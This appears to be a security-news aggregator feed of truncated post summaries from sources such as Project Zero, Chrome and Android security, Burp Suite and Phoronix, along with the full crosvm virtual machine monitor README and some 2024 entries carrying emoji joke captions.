
    Learn more about government surveillance and other civil liberties issues: Sign up for breaking news alerts, follow us on Twitter, and like us on Facebook.

    ...more

    1.7.22

    Published: 2019-03-07 23:05:11

    Popularity: None

    Author: Posted by

    This release introduces Burp Suite Mobile Assistant , a new tool to facilitate testing of iOS apps with Burp Suite. It supports the followi...

    ...more

    OSS-Fuzz: Five months later, and rewarding projects

    Published: 2019-03-07 23:01:44

    Popularity: None

    Author: Posted by Oliver Chang, Abhishek Arya (Security Engineers, Chrome Security), Kostya Serebryany (Software Engineer, Dynamic Tools), and Josh Armour (Security Program Manager)

    Posted by Oliver Chang, Abhishek Arya (Security Engineers, Chrome Security), Kostya Serebryany (Software Engineer, Dynamic Tools), and Josh ...

    ...more

    Final removal of trust in WoSign and StartCom Certificates

    Published: 2019-03-07 22:57:54

    Popularity: None

    Author: Posted by Andrew Whalley and Devon O'Brien, Chrome Security

    Posted by Andrew Whalley and Devon O'Brien, Chrome Security As previously announced , Chrome has been in the process of removing trust fro...

    ...more

    Trust Issues: Exploiting TrustZone TEEs

    Published: 2019-03-07 22:57:06

    Popularity: None

    Author: Posted by

    Posted by Gal Beniamini, Project Zero Mobile devices are becoming an increasingly privacy-sensitive platform. Nowadays, devices process ...

    ...more

    Bypassing VirtualBox Process Hardening on Windows

    Published: 2019-03-07 22:53:41

    Popularity: None

    Author: Posted by

    Posted by James Forshaw, Project Zero Processes on Windows are securable objects, which prevents one user logged into a Windows machine...

    ...more

    CCleanup: A Vast Number of Machines at Risk

    Published: 2019-03-07 22:51:28

    Popularity: None

    Author: Posted by

    A blog from the world class Intelligence Group, Talos, Cisco's Intelligence Group

    ...more

    The Great DOM Fuzz-off of 2017

    Published: 2019-03-07 22:50:21

    Popularity: None

    Author: Posted by

    Posted by Ivan Fratric, Project Zero Introduction Historically, DOM engines have been one of the largest sources of web browser bugs. A...

    ...more

    Broadening HSTS to secure more of the Web

    Published: 2019-03-07 22:49:40

    Popularity: None

    Author: Posted by Ben McIlwain, Google Registry

    Posted by Ben McIlwain, Google Registry The security of the Web is of the utmost importance to Google. One of the most powerful tools in th...

    ...more

    Behind the Masq: Yet more DNS, and DHCP, vulnerabilities

    Published: 2019-03-07 22:49:01

    Popularity: None

    Author: Posted by Fermin J. Serna, Staff Software Engineer, Matt Linton, Senior Security Engineer and Kevin Stadmeyer, Technical Program Manager

    Posted by Fermin J. Serna, Staff Software Engineer, Matt Linton, Senior Security Engineer and Kevin Stadmeyer, Technical Program Manager O...

    ...more

    chromiumos/platform/crosvm - Git at Google

    Published: 2019-03-07 22:49:00

    Popularity: None

    Author: by Lepton Wu

    crosvm - The Chrome OS Virtual Machine Monitor

    This component, known as crosvm, runs untrusted operating systems along with virtualized devices. No actual hardware is emulated; crosvm only runs VMs through Linux's KVM interface. What makes crosvm unique is a focus on safety within the programming language and a sandbox around the virtual devices to protect the kernel from attack in case of an exploit in the devices.

    Usage

    To see the usage information for your version of crosvm, run crosvm or crosvm run --help.

    Boot a Kernel

    To run a very basic VM with just a kernel and default devices:

    $ crosvm run "${KERNEL_PATH}" 

    The uncompressed kernel image, also known as vmlinux, can be found in your kernel build directory in the case of x86 at arch/x86/boot/compressed/vmlinux.

    Rootfs

    In most cases, you will want to give the VM a virtual block device to use as a root file system:

    $ crosvm run -r "${ROOT_IMAGE}" "${KERNEL_PATH}" 

    The root image must be a path to a disk image formatted in a way that the kernel can read. Typically this is a squashfs image made with mksquashfs or an ext4 image made with mkfs.ext4. By using the -r argument, the kernel is automatically told to use that image as the root, and therefore can only be given once. More disks can be given with -d or --rwdisk if a writable disk is desired.

    To run crosvm with a writable rootfs:

    WARNING: Writable disks are at risk of corruption by a malicious or malfunctioning guest OS.

    crosvm run --rwdisk "${ROOT_IMAGE}" -p "root=/dev/vda" vmlinux 

    NOTE: If more disks arguments are added prior to the desired rootfs image, the root=/dev/vda must be adjusted to the appropriate letter.

    Control Socket

    If the control socket was enabled with -s, the main process can be controlled while crosvm is running. To tell crosvm to stop and exit, for example:

    NOTE: If the socket path given is for a directory, a socket name underneath that path will be generated based on crosvm's PID.

    $ crosvm run -s /run/crosvm.sock ${USUAL_CROSVM_ARGS}
        <in another shell>
    $ crosvm stop /run/crosvm.sock

    WARNING: The guest OS will not be notified or gracefully shut down.

    This will cause the original crosvm process to exit in an orderly fashion, allowing it to clean up any OS resources that might have stuck around if crosvm were terminated early.

    Multiprocess Mode

    By default crosvm runs in multiprocess mode. Each device that supports running inside of a sandbox will run in a jailed child process of crosvm. The appropriate minijail seccomp policy files must be present either in /usr/share/policy/crosvm or in the path specified by the --seccomp-policy-dir argument. The sandbox can be disabled for testing with the --disable-sandbox option.

    Virtio Wayland

    Virtio Wayland support requires special support on the part of the guest and as such is unlikely to work out of the box unless you are using a Chrome OS kernel along with a termina rootfs.

    To use it, ensure that the XDG_RUNTIME_DIR environment variable is set and that the path $XDG_RUNTIME_DIR/wayland-0 points to the socket of the Wayland compositor you would like the guest to use.

    Defaults

    The following are crosvm's default arguments and how to override them.

    • 256MB of memory (set with -m)
    • 1 virtual CPU (set with -c)
    • no block devices (set with -r, -d, or --rwdisk)
    • no network (set with --host_ip, --netmask, and --mac)
    • virtio wayland support if XDG_RUNTIME_DIR environment variable is set (disable with --no-wl)
    • only the kernel arguments necessary to run with the supported devices (add more with -p)
    • run in multiprocess mode (run in single process mode with --disable-sandbox)
    • no control socket (set with -s)

    System Requirements

    A Linux kernel with KVM support (check for /dev/kvm) is required to run crosvm. In order to run certain devices, there are additional system requirements:

    • virtio-wayland - The memfd_create syscall, introduced in Linux 3.17, and a Wayland compositor.
    • vsock - Host Linux kernel with vhost-vsock support, introduced in Linux 4.8.
    • multiprocess - Host Linux kernel with seccomp-bpf and Linux namespacing support.
    • virtio-net - Host Linux kernel with TUN/TAP support (check for /dev/net/tun) and running with CAP_NET_ADMIN privileges.

    Emulated Devices

    Device            Description
    CMOS/RTC          Used to get the current calendar time.
    i8042             Used by the guest kernel to exit crosvm.
    serial            x86 I/O port driven serial devices that print to stdout and take input from stdin.
    virtio-block      Basic read/write block device.
    virtio-net        Device to interface the host and guest networks.
    virtio-rng        Entropy source used to seed guest OS's entropy pool.
    virtio-vsock      Enabled VSOCKs for the guests.
    virtio-wayland    Allowed guest to use host Wayland socket.

    Contributing

    Code Health

    build_test

    There are no automated tests run before code is committed to crosvm. In order to maintain sanity, please execute build_test before submitting code for review. All tests should be passing or ignored and there should be no compiler warnings or errors. All supported architectures are built, but only tests for x86_64 are run. In order to build everything without failures, sysroots must be supplied for each architecture. See build_test -h for more information.

    rustfmt

    All code should be formatted with rustfmt. We have a script that applies rustfmt to all Rust code in the crosvm repo: please run bin/fmt before checking in a change. This is different from cargo fmt --all which formats multiple crates but a single workspace only; crosvm consists of multiple workspaces.

    Dependencies

    With a few exceptions, external dependencies inside of the Cargo.toml files are not allowed. The reason is that community-made crates tend to explode the binary size by including dozens of transitive dependencies. All these dependencies also must be reviewed to ensure their suitability to the crosvm project. Currently allowed crates are:

    • byteorder - A very small library used for endian swaps.
    • cc - Build time dependency needed to build C source code used in crosvm.
    • libc - Required to use the standard library, this crate is a simple wrapper around libc's symbols.

    Code Overview

    The crosvm source code is written in Rust and C. To build, crosvm generally requires the most recent stable version of rustc.

    Source code is organized into crates, each with their own unit tests. These crates are:

    • crosvm - The top-level binary front-end for using crosvm.
    • devices - Virtual devices exposed to the guest OS.
    • io_jail - Creates jailed process using libminijail.
    • kernel_loader - Loads elf64 kernel files to a slice of memory.
    • kvm_sys - Low-level (mostly) auto-generated structures and constants for using KVM.
    • kvm - Unsafe, low-level wrapper code for using kvm_sys.
    • net_sys - Low-level (mostly) auto-generated structures and constants for creating TUN/TAP devices.
    • net_util - Wrapper for creating TUN/TAP devices.
    • sys_util - Mostly safe wrappers for small system facilities such as eventfd or syslog.
    • syscall_defines - Lists of syscall numbers in each architecture used to make syscalls not supported in libc.
    • vhost - Wrappers for creating vhost based devices.
    • virtio_sys - Low-level (mostly) auto-generated structures and constants for interfacing with kernel vhost support.
    • vm_control - IPC for the VM.
    • x86_64 - Support code specific to 64 bit intel machines.

    The seccomp folder contains minijail seccomp policy files for each sandboxed device. Because some syscalls vary by architecture, the seccomp policies are split by architecture.

    ...more

    Over The Air - Vol. 2, Pt. 2: Exploiting The Wi-Fi Stack on Apple Devices

    Published: 2019-03-07 22:48:36

    Popularity: None

    Author: Posted by

    Posted by Gal Beniamini, Project Zero In this blog post we’ll continue our journey towards over-the-air exploitation of the iPhone, by ...

    ...more

    Lock it up! New hardware protections for your lock screen with the Google Pixel 2

    Published: 2019-03-07 22:42:54

    Popularity: None

    Author: Posted by Xiaowen Xin, Android Security Team

    Posted by Xiaowen Xin, Android Security Team The new Google Pixel 2 ships with a dedicated hardware security module designed to be robust a...

    ...more

    OWASP is pleased to announce the release of the OWASP Top 10 - 2017

    Published: 2019-03-07 22:41:58

    Popularity: None

    Author: Posted by

    After a difficult gestation, the OWASP Top 10 Final is out. You can get it from here:    https://github.com/OWASP/Top10/tree/master/2017 ...

    ...more

    Reading privileged memory with a side-channel

    Published: 2019-03-07 22:35:55

    Popularity: None

    Author: Posted by

    Posted by Jann Horn, Project Zero We have discovered that CPU data cache timing can be abused to efficiently leak information out of mi...

    ...more

    Android Security Ecosystem Investments Pay Dividends for Pixel

    Published: 2019-03-07 22:34:48

    Popularity: None

    Author: Posted by Mayank Jain and Scott Roberts, Android security team

    Posted by Mayank Jain and Scott Roberts, Android security team [Cross-posted from the Android Developers Blog ] In June 2017, the Androi...

    ...more

    EFF and Lookout Uncover New Malware Espionage Campaign Infecting Thousands Around the World

    Published: 2019-03-07 22:34:40

    Popularity: None

    Author: by Nate Cardozo

    San Francisco – The Electronic Frontier Foundation (EFF) and mobile security company Lookout have uncovered a new malware espionage campaign infecting thousands of people in more than 20 countries. Hundreds of gigabytes of data has been stolen, primarily through mobile devices compromised by fake...

    ...more

    Zero-day vulnerability in Telegram

    Published: 2019-03-07 22:31:50

    Popularity: None

    Author: By

    In October 2017, we learned of a vulnerability in Telegram Messenger’s Windows client that was being exploited in the wild. It involves the use of a classic right-to-left override attack when a user sends files over the messenger service.

    ...more

    Android Security 2017 Year in Review

    Published: 2019-03-07 22:28:36

    Popularity: None

    Author: Posted by Dave Kleidermacher, Vice President of Security for Android, Play, ChromeOS

    Posted by Dave Kleidermacher, Vice President of Security for Android, Play, ChromeOS Our team’s goal is simple: secure more than two billi...

    ...more

    Total Meltdown?

    Published: 2019-03-07 22:27:11

    Popularity: None

    Author: Posted by

    Did you think Meltdown was bad? Unprivileged applications being able to read kernel memory at speeds possibly as high as megabytes per seco...

    ...more

    DNS over TLS support in Android P Developer Preview

    Published: 2019-03-07 22:24:45

    Popularity: None

    Author: Posted by Erik Kline, Android software engineer, and Ben Schwartz, Jigsaw software engineer

    Posted by Erik Kline, Android software engineer, and Ben Schwartz, Jigsaw software engineer [Cross-posted from the Android Developers Blog...

    ...more

    Google CTF 2018 is here

    Published: 2019-03-07 22:22:31

    Popularity: None

    Author: Posted by Jan Keller, Security TPM

    Posted by Jan Keller, Security TPM Google CTF 2017 was a big success! We had over 5,000 players, nearly 2,000 teams captured flags, we pai...

    ...more

    PeerTube, the “Decentralized YouTube”, succeeds in crowdfunding

    Published: 2019-03-07 22:16:08

    Popularity: None

    Author: Published by

    It is done. With 53,100 euros collected in forty-two days, the PeerTube project originating in France blows through its initial goal. The principle is intriguing: a fully decentralized version of YouTube, whose computer code is freely accessible and editable, and where videos are shared between users without relying on a central system. Online since March 2018 in a beta version, the …

    ...more

    Introducing the Tink cryptographic software library

    Published: 2019-03-07 22:11:20

    Popularity: None

    Author: Posted by Thai Duong, Information Security Engineer, on behalf of Tink team

    Posted by Thai Duong, Information Security Engineer, on behalf of Tink team At Google, many product teams use cryptographic techniques to ...

    ...more

    Professional 2.0.04beta

    Published: 2019-03-07 22:11:14

    Popularity: None

    Author: Posted by

    This release contains a number of bugfixes. Note:  This is an incremental update to the Burp 2.0  beta release , and the same caveats appl...

    ...more

    Enterprise Edition 1.0beta

    Published: 2019-03-07 22:11:11

    Popularity: None

    Author: Posted by

    This is a brand new product. See today's blog post announcement for full details. Note that this is a beta release . It may contain bugs,...

    ...more

    Google and Android have your back by protecting your backups

    Published: 2019-03-07 22:08:15

    Popularity: None

    Author: Posted by Troy Kensinger, Technical Program Manager, Android Security and Privacy

    Posted by Troy Kensinger, Technical Program Manager, Android Security and Privacy Android is all about choice. As such, Android strives to...

    ...more

    Modernizing Transport Security

    Published: 2019-03-07 22:08:03

    Popularity: None

    Author: Posted by David Benjamin, Chrome networking

    Posted by David Benjamin, Chrome networking *Updated on October 17, 2018 with details about changes in other browsers TLS (Transport Lay...

    ...more

    Android Protected Confirmation: Taking transaction security to the next level

    Published: 2019-03-07 22:07:48

    Popularity: None

    Author: Posted by Janis Danisevskis, Information Security Engineer, Android Security

    Posted by Janis Danisevskis, Information Security Engineer, Android Security [Cross-posted from the Android Developers Blog ] In Android...


    The New Restartable Sequences System Call Is Living Up To Its Performance Claims - Phoronix

    Published: 2019-03-07 22:07:04

    Popularity: None

    Author: Written by

    Introduced in the Linux 4.18 kernel was the Restartable Sequences "rseq" system call intended to yield faster user-space operations on per-CPU data. As covered during a presentation at this week's Open-Source Summit Europe, that system call is indeed providing performance wins while it's not widely utilized yet.

    The restartable sequences system call allows for faster performance in per-CPU data updates from user-space for items like incrementing per-CPU counters, modifying data protected by per-CPU spinlocks, reading/writing per-CPU ring buffers, and similar operations while the kernel guarantees atomic behavior. The RSEQ system call was merged for Linux 4.18 while in the newly-released Linux 4.19 kernel the syscall is supported on ARM64 and other architectures.

    There still is ongoing work for improving Restartable Sequences especially with utilizing this syscall from different key components in the Linux user-space, but it's looking like the performance benefits are worthwhile. Mathieu Desnoyers of EfficiOS presented at this week's Open-Source Summit Europe in Edinburgh where he covered this interesting kernel work. The benchmark results are what excited us the most:

    For those wishing to learn more about the ongoing RSEQ syscall work who weren't able to make it to Edinburgh for the event, Desnoyers' slide deck can be viewed here (PDF). There is also another presentation by Mathieu back from Linux Plumbers 2016 with more background information on this system call if you are interested in more reading this weekend.


    iPhones are Allergic to Helium

    Published: 2019-03-07 22:06:22

    Popularity: None

    Author: written by

    This is the kind of tale that you don’t hear every day.  During the installation of a new MRI machine, a technician started getting calls that iPhones weren’t working—but Androids were just fine.


    Introducing reCAPTCHA v3: the new way to stop bots

    Published: 2019-03-07 22:06:08

    Popularity: None

    Author: Posted by Wei Liu, Google Product Manager

    [Cross-posted from the Google Webmaster Central Blog] Today, we’re excited to introduce reCAP...


    Introducing the Android Ecosystem Security Transparency Report

    Published: 2019-03-07 22:05:51

    Popularity: None

    Author: Posted by Jason Woloz and Eugene Liderman, Android Security & Privacy Team

    Update: We identified a bug that affected how we calculated dat...


    Google Public DNS now supports DNS-over-TLS

    Published: 2019-03-07 22:00:16

    Popularity: None

    Author: Posted by Marshall Vale, Product Manager and Puneet Sood, Software Engineer

    Google Public DNS is the world’s largest public Domain Name Se...


    Vulnerability Spotlight: Python.org certificate parsing denial-of-service

    Published: 2019-03-07 21:58:43

    Popularity: None

    Author: Posted by

    A blog from the world class Intelligence Group, Talos, Cisco's Intelligence Group


    Open sourcing ClusterFuzz

    Published: 2019-03-07 21:58:06

    Popularity: None

    Author: Posted by Abhishek Arya, Oliver Chang, Max Moroz, Martin Barbella and Jonathan Metzman (ClusterFuzz team)

    [Cross-posted from the Google Op...


    Introducing Adiantum: Encryption for the Next Billion Users

    Published: 2019-03-07 21:58:05

    Popularity: None

    Author: Posted by Paul Crowley and Eric Biggers, Android Security & Privacy Team

    Storage encryption protects your data if your phone falls in...


    A peek into build provenance for Homebrew

    Published: 2024-05-14 14:00:58

    Popularity: None

    Author: blog.trailofbits.com by yossarian

    Keywords:

  • ruby
  • security
  • cryptography

    Re: Crowdstrike Timeline Mystery

    Published: 2024-07-30 15:44:20

    Popularity: None

    Author: by Garbi

    Keywords:

  • security
  • ask

    🤖: "Mystery solved GIF: "Plot Twist""

    https://lobste.rs/s/t2hj6o/crowdstrike_timeline_mystery https://www.bitsight.com/blog/crowdstrike-timeline-mystery In the comments on this article, I asked a question that no one answered and it’s still bugging me so I’ll ask it again: How does one company know so much about another company’s traffic?


    UBIFS File-System Being Hardened Against Power Loss Scenarios

    Published: 2024-07-28 23:19:25

    Popularity: None

    Author: Written by

    🤖: "Battery backup mode"

    While most Linux file-systems are rather robust in recovering when the system experiences a power loss, the UBIFS file-system is more prone to problems when a power-cut happens


    Open-source fine-grained authorization service inspired by Google Zanzibar

    Published: 2024-08-28 15:55:44

    Popularity: None

    Author: github.com by eaytin

    Keywords:

  • security
  • go
  • scaling
  • show

    🤖: ""Authorization zone""

    Show HN: Permify 1.0 - Open-source fine-grained authorization service

    Permify was born out of our repeated struggles with authorization. Like any other piece of software, authorization starts small but as things grow scaling it becomes a real pain and begins to hinder product development processes. Ad-hoc authorization systems scattered throughout your app’s codebase are hard to manage, reason about, and iterate on as the company grows. Also you will need to have more specific access controls as things grow. Traditional approaches like RBAC are inefficient for defining granular permissions such as resource-specific, hierarchical, or context-aware permissions. Architecture is another problem, in a distributed system you’re going to need a solid plan to manage permissions between your services — all while ensuring high availability and providing low latency in access checks for sure.

    We’ve created an open-source project to eliminate the authorization burden for devs. It’s Permify, an Authorization-as-a-Service to help developers build and manage their authorization in a scalable, secure, and extendable manner. And last week, we released the first major version (v1.0.0) of it!

    Here is how Permify helps you handle authorization.

    - Centralize & Standardize Your Authorization: Abstract your authorization logic from your codebase and application logic to easily reason, test, and debug your authorization. Treat your authorization as a sole entity and move faster within your core development.
    - Build Granular Permissions For Any Case You Have: You can create granular (resource-specific, hierarchical, context aware, etc) permissions and policies using Permify’s domain specific language that is compatible with RBAC, ReBAC and ABAC.
    - Set Custom Authorization For Your Tenants: Set up isolated authorization logic and custom permissions for your vendors/organizations (tenants) and manage them in a single place.
    - Scale Your Authorization As You Wish: Achieve lightning-fast response times down to 10ms for access checks with a proven infrastructure inspired by Google Zanzibar, Google’s Consistent, Global Authorization System.

    Try it out and send any feedback our way!


    NVIDIA Publishes Open-Source Linux Driver Code For GPU Virtualization "vGPU" Support

    Published: 2024-09-25 17:23:39

    Popularity: None

    Author: Written by

    🤖: "gpu party"

    NVIDIA engineers have sent out an exciting set of Linux kernel patches for enabling NVIDIA vGPU software support for virtual GPU support among multiple virtual machines (VMs)


    "100% Free" GNU Boot Discovers Again They Have Been Shipping Non-Free Code

    Published: 2024-10-20 00:52:58

    Popularity: None

    Author: Written by

    🤖: "Linux fail 😒👀"

    GNU Boot is a '100% free software project aimed at replacing the non-free boot software' and is a downstream of Coreboot, GRUB, and SeaBIOS


    OpenPaX Announced As "Open-Source Alternative To GrSecurity" With Free Kernel Patch

    Published: 2024-10-31 12:42:08

    Popularity: None

    Author: Written by

    🤖: "Kernel patch party"

    Enterprise security firm Edera today is announcing OpenPaX that they promoted in their advance press notice as a 'new open-source alternative to GrSecurity.' GrSecurity being the firm focused on providing out-of-tree Linux kernel patches focused in the name of security enhancements
